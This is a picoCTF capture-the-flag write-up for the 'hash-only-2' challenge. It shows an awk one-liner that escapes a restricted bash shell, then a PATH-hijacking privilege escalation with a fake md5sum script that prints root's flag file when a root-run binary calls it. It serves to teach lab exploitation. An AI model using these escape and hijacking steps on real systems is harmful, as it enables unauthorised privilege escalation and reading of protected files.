Security Forem

Hitanshu Gedam
Hitanshu Gedam

Posted on

picoCTF hash-only-2 writeup

Hello, hackers!

In this challenge, we were asked to SSH into a remote machine using provided credentials. After logging in, I quickly realized that we were placed in a restricted bash shell (rbash). Basic commands like cd or executing binaries with paths (e.g. /bin/bash) were not allowed, making it clear that our environment was intentionally limited.

🛠 Escaping Restricted Shell with awk

While exploring ways to escape, I recalled that awk can execute system commands. I had just started learning awk, so I looked up how to use it for shell escaping — and found a reliable one-liner:

awk 'BEGIN {system("/bin/bash")}'
Enter fullscreen mode Exit fullscreen mode

Explanation:

  • awk runs the BEGIN block before processing any input.
  • system("/bin/bash") tells it to execute a new Bash shell.
  • This trick is commonly used to escape rbash or other restricted environments in CTFs.

Once this command was executed, I successfully escaped the restricted shell and gained full access to a regular Bash session.

Discovering the Target Binary

With unrestricted access, I began searching the system for binaries of interest. Using find, I located the target file:

/usr/local/bin/flaghasher

Running this binary produced an MD5 hash followed by the filename /root/flag.txt. While we now knew the flag was in /root/flag.txt, we couldn’t read it directly as a regular user.

Exploiting the md5sum Call

Based on experience with a previous challenge (hash-only-1), I suspected the binary might be calling md5sum internally to compute the hash. If so, and if it relied on the environment's PATH, we could potentially override the md5sum command with our own script.

After a quick consultation with ChatGPT (thanks!), I created a malicious md5sum script in the current directory:

cat > md5sum <<'EOF'
#!/bin/bash
cat "$1"
cat /root/flag.txt
EOF
Enter fullscreen mode Exit fullscreen mode

Line-by-Line Explanation:

  • cat > md5sum <<'EOF': Creates a file named md5sum and writes the following content into it.
  • #!/bin/bash: Standard shebang line — tells the system to run the script using Bash.
  • cat "$1": Outputs the contents of the first argument passed to md5sum (i.e., the target file).
  • cat /root/flag.txt: Appends the contents of the actual flag file, which would be accessible if the parent process (like flaghasher) is running as root.

Next, I made the script executable:

chmod +x md5sum

Then, I modified the PATH variable so that the shell would use our fake version of md5sum before looking in system directories:

export PATH=.:$PATH

This ensures that any call to md5sum would execute our malicious script.

Result

I ran the flaghasher binary again — and this time, thanks to the overridden md5sum, the contents of /root/flag.txt were printed directly to the screen.

Flag captured. Mission complete. ✅

pico webshell

Top comments (0)